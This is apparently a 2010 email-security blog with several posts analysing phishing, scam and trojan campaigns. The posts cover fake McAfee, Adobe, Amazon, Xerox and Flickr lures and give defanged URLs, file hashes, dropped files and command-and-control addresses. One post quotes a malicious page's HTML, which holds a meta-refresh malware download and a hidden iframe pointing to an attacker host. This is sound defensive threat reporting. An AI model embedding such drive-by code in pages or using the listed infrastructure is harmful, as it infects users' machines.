Emails with 30-day trials of McAfee VirusScan Plus contains trojan

July 28, 2010 2 Comments

MX Lab intercepted emails with the subject “McAfee VirusScan Plus” that contains a virus. The from address is in the format “xxx.be Member Services” <support@xxxxx.be> but the real SMTP from address comes primary from the domains rote-rose.com and rotary1918.com at this time of writing.

The body of the email:

Download a FREE 30-day Trial of MCAfee VirusScan Plus and Be Automaticaly Entered to Win

Installation file attached

The email contains the attachment setup.zip that contains the 144 kB large file setup.exe.

The trojan is known as Mal/Behav-321 (Sophos), TROJ_FAKEAV.SMXG (TrendMicro), W32/Trojan3.BWP (Authentium).

VirusTotal permlink and MD5: d3de1f75b8151c284ab04819994c0dc9.

Filed under Viruses Tagged with , , , , ,

Emails offering PDF Reader 2010 lead to unsecure payment site

July 27, 2010 7 Comments

MX Lab intercepted some emails with the subject “Upgrade New PDF Acrobat Reader/Writer For Windows And Mac” from the email address “Adobe <newsletter@adobe-upgrade-2010.com>”. Notice the use of Adobe in the email. In the email, an offer is made to download the new PDF Reader 2010 for Windows and Mac.

This is the body of the email:

PDF Reader 2010 – New Version for Windows and Mac
The latest PDF Reader: Open, Edit Create PDF Files

What’s new in this version :

-Open, edit and view all PDF files.
-Enhanced performance with faster loading and zooming.
-Collect your data and combine it into a high quality document.

hxxp://www.adobe-upgrade-2010.com/

Thank you for choosing us, the worldwide leader in PDF Reader
Solutions.

Best Regards,

Tommy Johnson
PDF Reader 2010

When visiting this web site, it all makes perfect sense, it’s a company that offers a PDF Reader/Writer that can do more than the Adobe Reader on its own. But when you go further you will notice some issues with the web site and the offer.

When following the URL in the email, you get redirected to hxxp://2010-pdf-pro.com/.

It seems like you can download the software for free, there is no pricing information on the web site, so you go forward with the Download button.

The Download button leads to the page hxxp://2010-pdf-pro.com/join.asp but you will get a redirect again to the domain hxxp://secure-signup.ru/. Do not get fooled by the domain name secure-signup.ru. The browser session is not secured at all while most genuine web shops already have a secured session through https:// when you sign up for a service or software.

The site asks you to fill in your email address twice for confirmation, your first and last name and country.

When continuing to step 2 you will get the membership choices and here we have it: the PDF Reader 2010 comes not for free. You will need to choose from some 1, 2 or 3 year online access and support.

When you have made your choice you can continue the process by validating your credit card. Notice that you haven’t filled in any details regarding invoicing. The web forms did not ask for your address, zip or postcode to create an invoice or proof of purchase.

On the web form to validate your credit card, you still have no secure https:// connection. This means that your details are send over the internet without any encryption at all and can be read by anyone. What’s worse, your credit card details are now in the hands of a person or group with bad intentions.

Update 29 July 2010:

On the 27th we did fill in a dummy email address to test the webforms on the web sites above and today we received a mailing with the following content:

Dear valued customers,

We are pleased to announce the newest version of PDF Reader 2010 which will enable you to view, create, edit and print PDF documents. The PDF format as a global exchange document format is created by Adobe and is the most efficient way to exchange information.

Simply visit the link below and enter your PDF reader code:

PDF Reader Code: 5013
Go here to receive the latest 2010 version

Thank you for choosing us, the worldwide leader in PDF Reader solutions.

Mike Robertson
PDF Reader Support

Copyright PDF Reader 2010 – All rights reserved

You are currently subscribed to sm-pdf as geert@betransport.com
Safely unsubscribe from sm-pdf at any time.

Media Internet Consultants – Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a, Panama

Behind “Go here to receive the latest 2010 version” is the link hxxp://list.directmediafive.com/t/2549518/64766653/4988/0/ that will redirect you to hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677&camp=pdf_x1

The web form is now somewhat different and allows you to fill in your PDF Reader code 5013. Based on this you get a certain discount. When we wanted to leave the page an go back one page, we got a pop up windows with an 50% reduction in the price, offered for a 24 hour period with a count down counter on the site.

When going further through the process, we did got an https:// connection for sending the credit card details. But based on the facts above and mentioned in this article, I would not recommend anyone doing this. There are too many variables that gives us the idea that buying on this site will result in troubles.

The mailing also contains an unsubscribe URL using hxxp://list.directmediafive.com/. It gives you the idea that this is a genuine company. But what is quite interesting, is that when visiting the domain http://www.directmediafive.com/ directly, you will get a web page of a parked domain.

We have used the unsubscribe URL included in the mailing and will now see what happens during the next few days.

Filed under Email security, Various Tagged with , ,

Amazon orders and email confirmation leads to PDF malware

July 23, 2010 Leave a Comment

Since last week, MX Lab intercepts emails with requests to confirm your email address or orders processed by Amazon. This campaign has been received in quite large quantities and we have been investigating what they are about.

At first we thought they where phishing emails but so far we haven’t been able to establish connection with the sites that are mentioned in the URLs included in the message.

This is the latest screenshot of an email requesting confirmation of the email. The lay out is very well done as you can see. The Amazon images are embedded in the message through an image tag and they come directly from servers from Amazon.

But, the links in the email as obfuscated and point to web sites like:

hxxp://busnwsonline.com/index.php?pid=14

Which redirects in this case to:

hxxp://lunchstroke.ru:8080/index.php?pid=14

Following the URL will lead you to short-lived web sites hosting malicious PDF files. The PDF file appears to be offered in an HTML iframe tag so that it can be launched with no interference.

Filed under Malware, Viruses Tagged with , ,

Adobe Flash malware in what appears as phishing emails

July 23, 2010 Leave a Comment

MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of an important Flash Player update from Adobe.

Online Banking Account Alert

The first example comes from the spoofed email address “Electronic Payments Association <buttesob62@rowan-glen.com>” with the subject “Online Banking Account Alert!” and this is the body of the email:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

When visiting the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and our donwload manager opened to download the file adobe_flash_install.exe. This is the code of the web site page:

Sorry, you need to install flash player to see this content...

<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/
adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1'
 height='1' style='visibility: hidden;'></iframe>

However, on Safari we got an HTML frameset to access the web site. It appears that some Javascript redirection is active.

An unauthorized transaction billed from your bank account

The second example comes from the spoofed address “Electronic Payments Association <euphemismm215@reagirona.com>”, has the subject “An unauthorized transaction billed from your bank account” and  this is the body of the email:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA – The Electronic Payments Association

The text “Unauthorized ACH Transaction Report” contains a link to a fast flux domain. Following the link gives us the following screen in the browser, included with an download of the file adobe_flash_install.exe.

At the time of writing, no AV engines at Virus Total did detect the threat. Virus Total permlink and MD5: 97732f717f50c38714a3f9c8d8c6274a.

Filed under Viruses Tagged with , ,

Oficla trojan in emails with subject “Scan from a Xerox WorkCentre Pro”

July 17, 2010 1 Comment

MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257″ that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats:

Scan from a Xerox WorkCentre Pro N 6204257
Scan from a Xerox WorkCentre Pro #866521

The email targets business users. It is quite common that an office print and scan center like a Xerox machine will send a scanned document by email to a recipient.

The body of the email:

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX6150AA7ACDB45706461

For more information on Xerox products and solutions, please visit

http://www.xerox.com

The email contains a ZIP archive named XeroxN6204257.zip with the 32 kB large document Xerox_doc.exe inside. Note that the number of the ZIP archive matches the number in the subject line and will be different with each email.

The trojan is known as Gen:Variant.Oficla.4 (F-Secure, GData, NSecure) or W32/Oficla.AP (Authentium).

The following files will be created:

%Temp%\1.tmp
%System%\thxr.wgo
%Temp%\2.tmp
%System%\svrwsc.exe

The following directories are created:

%CommonAppData%\Microsoft\OFFICE
%CommonAppData%\Microsoft\OFFICE\TEMP

The Windows service SvrWsc - Windows Security Center Service with the filename %System%\svrwsc.exe will be stopped. Do not be fooled, the Windows Security Center Service is a malicious service and has nothing to do with the legitimate service Security Center from Windows .

Several Windows registry changes will be exectued and the trojan can establish connection with the following IPs on port 80:

80.74.132.218
91.212.127.40
91.216.215.66

Data can be obtained from following URLs:

  • hxxp://www.kollo.ch/images/cgi.exe
  • hxxp://musiceng.ru/music/forum/index1.php
  • hxxp://hulejsoops.ru/images/bb.php?v=200&id=465538349&b=avpsales&tm=1
  • hxxp://hulejsoops.ru/images/bb.php?v=200&id=465538349&tid=26&b=avpsales&r=1&tm=1

At the time of writing, only 6 of the 41 AV engines did detect the trojan at Virus Total. Virus Total permlink and MD5: 1d378a6bc94d5b5a702026d31c21e242.

Filed under Viruses Tagged with , , , , ,

Flickr welcome message leads to Canadian Pharmacy web site

July 6, 2010 Leave a Comment

Various brands have been subject to spam campaigns and today Flickr, the photo sharing web site, is now also being abused by spammers.

MX Lab started to intercept messages with the subject “[Flickr] Welcome!”, send from a spoofed email address, with an welcome message  from Flickr (see image below).

Every link in the message leads to a different URL, even the links behind Terms of Services or the Privacy Policy.

hxxp://mahimatex.com/sanitation.html
hxxp://electricbrochures.com/custodian.html
hxxp://eventosgs.com.ar/climate.html
hxxp://newcivas.altervista.org/overstatements.html
hxxp://complicat.go.ro/modestly.html
hxxp://kankash-g-s.com/chicagoans.html
hxxp://pliki.open-it.pl/deigned.html
hxxp://turismatica.go.ro/grapefruit.html
hxxp://behsood.ir/schedulable.html
hxxp://jpaquino.com/headlines.html
hxxp://awtchiro.com/consulates.html

The web sites above function as a redirect to hxxp://keptoften.com/

Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.

I personally do not understand why they are doing this because an Intent Analysis filter, that analyses the included URLs in emails, can blacklist many URLs from these web sites immediatly when investigating one single spam message.

When only using the domain for visiting the sites we get quite often a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy hxxp://pharmacymentalhealth.com (see image below).

Filed under Spam Tagged with , , ,

Follow

Get every new post delivered to your Inbox.

Join 109 other followers